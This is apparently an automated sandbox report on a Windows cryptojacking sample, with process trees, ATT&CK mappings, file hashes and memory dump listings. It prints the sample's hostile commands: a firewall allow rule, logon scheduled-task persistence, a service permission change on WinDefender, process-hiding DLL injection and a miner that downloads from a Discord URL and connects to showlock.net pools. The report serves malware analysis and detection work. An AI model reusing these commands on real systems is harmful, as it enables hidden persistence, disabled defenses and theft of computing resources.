PID 4264 wrote to memory of 4280	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	cmd.exe
PID 4280 wrote to memory of 3544	4280	cmd.exe	netsh.exe
PID 4280 wrote to memory of 3544	4280	cmd.exe	netsh.exe
PID 4264 wrote to memory of 3704	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 3704	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 3704	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1816	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1816	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1816	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 2692	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	csrss.exe
PID 4264 wrote to memory of 2692	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	csrss.exe
PID 4264 wrote to memory of 2692	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	csrss.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4496	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4496	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4496	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4544	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4544	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4544	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 2456	2692	csrss.exe	injector.exe
PID 2692 wrote to memory of 2456	2692	csrss.exe	injector.exe
PID 1068 wrote to memory of 3212	1068	windefender.exe	cmd.exe
PID 1068 wrote to memory of 3212	1068	windefender.exe	cmd.exe
PID 1068 wrote to memory of 3212	1068	windefender.exe	cmd.exe
PID 3212 wrote to memory of 1136	3212	cmd.exe	sc.exe
PID 3212 wrote to memory of 1136	3212	cmd.exe	sc.exe
PID 3212 wrote to memory of 1136	3212	cmd.exe	sc.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe
PID 2692 wrote to memory of 4632	2692	csrss.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
"C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
"C:\Users\Admin\AppData\Local\Temp\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe"
2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:3544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1744

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
4⤵
PID:400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2456

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:2248

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
4⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --tls --nicehash -o showlock.net:443 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --tls --nicehash -o showlock.net:80 --rig-id 91e9e6ce-07ef-4900-a090-79ea3d566a62 --nicehash --http-port 3433 --http-access-token 91e9e6ce-07ef-4900-a090-79ea3d566a62 --randomx-wrmsr=-1
5⤵
PID:2348

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 2348
5⤵
PID:4528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:3180

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4764

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_areqgxhj.ef5.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
Filesize
5.2MB

MD5
4f649a57b7ddf3874c9a2163a73e9b07

SHA1
9c966520ba8233f13f168cade548baf5a30823ba

SHA256
830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491

SHA512
b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
6f6315638b9778bff65e56af1f4734c5

SHA1
dfc39b25cfdeeb06345e928017963f5607d1bc5d

SHA256
d7a5cb24a31f4f9f22486199c48a914302679b632a4a0dc2f48eb74e94c4fa8f

SHA512
31929b1fcdbd2fc5b110d83c4438588f2cfb891b0925488beb85efd95ef354cbb48dc1c00f0544f80ebc340aeae5d66d8a71a21a73c7e544b05e2639d2528e5a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
1c09728f9d7cd1d73cb98c9095016323

SHA1
39c1d5784839c6df5dbfac2323e8c5ca64389eb0

SHA256
06e0ada22e6a4298f713cfd49d435b590ef52a1794a3b67b6f9ad26a9e7c6bfd

SHA512
87ffcaad6413fcc053d5965ed8c01672f77edc7118e25021d55b0b840e5eb129699368e691cafbc7b5349c9193fce78414c1785da954fbf2d1f79d642b056469

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
0a94d08a62f276f5b2fcc3ce34011d48

SHA1
ea62469acfc8d818098da3ada23a6a1237f4b051

SHA256
fef2a46fb72c2a51a37b24179267e3a546ebf029caa07e6307acacc88b9ca5ad

SHA512
0d7fdbc3e705993ae328f9f9e526f95b6d30bdbdee56fc116d50f2ca84725f4b98d4db296732847fdca9cfb3056eff111df1f9b4188963bdc5f0721183269f4a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
61528b731d3472984581d8d1e82a6522

SHA1
ca5cf0f17e915bee81cb745159707eb9b45227cf

SHA256
bd596a3a0348ead63b699cd834d42ef69a62402828a4b173214f68922c74616f

SHA512
b524b0275f630a7c393b907de55910c1b068a558fafaee0cc0fcd87d4a301f0780433e4f5113e6739b077b4b59865b5c247124e00fffacf1cb0d575d85385054

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
fe7115e7d0afb50e5d61d4b2c2864a89

SHA1
f7e6c2376a6705bc2f395d3eb60507d277c032d3

SHA256
ad334085dd3b96ed429f21f2ec16c902ca50e7601617fb0d0fab4c6deff3961b

SHA512
db559413e20b1f38512daab8f5cfde102085f69d20462375d6d013ff338c711a72c11842a18e29ab0d2e55a639bfeaef7d973fbf662285b4e41921cc682bf88b

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
d65e806ef21107aae5701f096ca69c69

SHA1
21ffbb083ba99a64f2f1a1e239d372a0dad06ef8

SHA256
ecbf3a804513a5876ab359cda0342d746ef4e709a2f31744fe5e25f3e139118e

SHA512
8a469f57652386a5cf49ae1990fa792c36f09c4a733b6619d7d06fb95708e15285b1142303cbfbf494f6ca4f7c8a595ea4f0476cdfcf4ea6d252daaf299bd52a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
b5225cd481f8ab5920e8a413c906a68e

SHA1
8ab5411eaef4d56e3940f5446d877955e03b1cc4

SHA256
0e2dfb1169b8c21c44e0a2763eccf7a88ca44e2b99f6cc958749d211b02a6f4c

SHA512
34fea30a8d5bfc25509b31f6ce2936c0ee2bdf66035d239cdabbeecd09d1736f64bc7e18987715d2eb961ebd57cf2a70802801bfbc55db1eba143bba9996a4bb

Download Submit
C:\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
a4734cab18c1867dd826d1bc77803448

SHA1
1c7be6a15941733206382aa51d0f08e46e9e5d59

SHA256
c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f

SHA512
bcc9d94788b600592cfc08a9e004bc1d444aab2236b340d11a828342d338b2aca840240f278cdc228529d9f5534f59c15d0e100a0b188ece2a1eb37d0d3512ea

Download Submit
C:\Windows\windefender.exe
Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
memory/1068-1794-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1816-820-0x000000006FB20000-0x000000006FE70000-memory.dmp

Filesize
3.3MB

Download
memory/1816-819-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

Filesize
300KB

Download
memory/1816-826-0x000000007F600000-0x000000007F610000-memory.dmp

Filesize
64KB

Download
memory/1816-1039-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/1816-798-0x0000000004B90000-0x0000000004BA0000-memory.dmp

Filesize
64KB

Download
memory/1816-796-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/1928-552-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/1928-310-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/1928-330-0x000000007F0C0000-0x000000007F0D0000-memory.dmp

Filesize
64KB

Download
memory/1928-331-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

Filesize
300KB

Download
memory/1928-338-0x0000000006A90000-0x0000000006AA0000-memory.dmp

Filesize
64KB

Download
memory/1928-337-0x0000000009000000-0x00000000090A5000-memory.dmp

Filesize
660KB

Download
memory/1928-332-0x000000006FB20000-0x000000006FE70000-memory.dmp

Filesize
3.3MB

Download
memory/1928-311-0x0000000008030000-0x000000000807B000-memory.dmp

Filesize
300KB

Download
memory/1928-309-0x0000000007700000-0x0000000007A50000-memory.dmp

Filesize
3.3MB

Download
memory/1928-308-0x0000000006A90000-0x0000000006AA0000-memory.dmp

Filesize
64KB

Download
memory/1928-307-0x0000000006A90000-0x0000000006AA0000-memory.dmp

Filesize
64KB

Download
memory/2348-2130-0x000002B472FB0000-0x000002B472FD0000-memory.dmp

Filesize
128KB

Download
memory/2624-281-0x000000000A400000-0x000000000A408000-memory.dmp

Filesize
32KB

Download
memory/2624-12-0x0000000007E40000-0x0000000007EA6000-memory.dmp

Filesize
408KB

Download
memory/2624-14-0x00000000082A0000-0x00000000082BC000-memory.dmp

Filesize
112KB

Download
memory/2624-15-0x00000000082F0000-0x000000000833B000-memory.dmp

Filesize
300KB

Download
memory/2624-299-0x0000000072CA0000-0x000000007338E000-memory.dmp

Filesize
6.9MB

Download
memory/2624-276-0x000000000A410000-0x000000000A42A000-memory.dmp

Filesize
104KB

Download
memory/2624-34-0x0000000008760000-0x000000000879C000-memory.dmp

Filesize
240KB

Download
memory/2624-72-0x000000007F100000-0x000000007F110000-memory.dmp

Filesize
64KB

Download
memory/2624-73-0x000000000A250000-0x000000000A283000-memory.dmp

Filesize
204KB

Download
memory/2624-11-0x0000000007DD0000-0x0000000007E36000-memory.dmp

Filesize
408KB

Download
memory/2624-74-0x000000006F9B0000-0x000000006F9FB000-memory.dmp

Filesize
300KB

Download
memory/2624-13-0x0000000007EB0000-0x0000000008200000-memory.dmp

Filesize
3.3MB

Download
memory/2624-10-0x0000000007B50000-0x0000000007B72000-memory.dmp

Filesize
136KB

Download
memory/2624-7-0x0000000072CA0000-0x000000007338E000-memory.dmp

Filesize
6.9MB

Download
memory/2624-9-0x00000000074B0000-0x0000000007AD8000-memory.dmp

Filesize
6.2MB

Download
memory/2624-8-0x0000000006E70000-0x0000000006E80000-memory.dmp

Filesize
64KB

Download
memory/2624-6-0x0000000006E20000-0x0000000006E56000-memory.dmp

Filesize
216KB

Download
memory/2624-83-0x000000000A470000-0x000000000A504000-memory.dmp

Filesize
592KB

Download
memory/2624-75-0x000000006FA00000-0x000000006FD50000-memory.dmp

Filesize
3.3MB

Download
memory/2624-82-0x0000000006E70000-0x0000000006E80000-memory.dmp

Filesize
64KB

Download
memory/2624-76-0x000000000A230000-0x000000000A24E000-memory.dmp

Filesize
120KB

Download
memory/2624-81-0x000000000A290000-0x000000000A335000-memory.dmp

Filesize
660KB

Download
memory/2624-65-0x00000000093D0000-0x0000000009446000-memory.dmp

Filesize
472KB

Download
memory/2692-1802-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1830-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1844-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1842-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1840-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1838-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1836-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1046-0x0000000003800000-0x0000000003BF9000-memory.dmp

Filesize
4.0MB

Download
memory/2692-1834-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1832-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1828-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1826-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1824-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1049-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1822-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1820-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1818-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1816-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1814-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1812-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1786-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1787-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1810-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1808-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1796-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1806-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1798-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1804-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/2692-1800-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/3632-2127-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/3704-578-0x000000006FAD0000-0x000000006FB1B000-memory.dmp

Filesize
300KB

Download
memory/3704-793-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/3704-577-0x000000007F5F0000-0x000000007F600000-memory.dmp

Filesize
64KB

Download
memory/3704-556-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/3704-557-0x0000000006F00000-0x0000000006F10000-memory.dmp

Filesize
64KB

Download
memory/3704-579-0x000000006FB20000-0x000000006FE70000-memory.dmp

Filesize
3.3MB

Download
memory/3704-584-0x0000000006F00000-0x0000000006F10000-memory.dmp

Filesize
64KB

Download
memory/4264-818-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4264-825-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4264-303-0x0000000003420000-0x0000000003825000-memory.dmp

Filesize
4.0MB

Download
memory/4264-797-0x0000000003420000-0x0000000003825000-memory.dmp

Filesize
4.0MB

Download
memory/4264-306-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4264-1043-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4632-1075-0x000000006FA30000-0x000000006FA7B000-memory.dmp

Filesize
300KB

Download
memory/4632-1052-0x0000000008160000-0x00000000084B0000-memory.dmp

Filesize
3.3MB

Download
memory/4632-1051-0x00000000073D0000-0x00000000073E0000-memory.dmp

Filesize
64KB

Download
memory/4632-1074-0x000000007E5B0000-0x000000007E5C0000-memory.dmp

Filesize
64KB

Download
memory/4632-1053-0x0000000072D00000-0x00000000733EE000-memory.dmp

Filesize
6.9MB

Download
memory/4632-1050-0x00000000073D0000-0x00000000073E0000-memory.dmp

Filesize
64KB

Download
memory/4632-1055-0x0000000008DB0000-0x0000000008DFB000-memory.dmp

Filesize
300KB

Download
memory/4716-302-0x0000000005090000-0x000000000597B000-memory.dmp

Filesize
8.9MB

Download
memory/4716-1-0x00000000032F0000-0x00000000036EC000-memory.dmp

Filesize
4.0MB

Download
memory/4716-300-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4716-3-0x0000000000400000-0x000000000300A000-memory.dmp

Filesize
44.0MB

Download
memory/4716-2-0x0000000005090000-0x000000000597B000-memory.dmp

Filesize
8.9MB

Download
memory/4764-1797-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4764-1801-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download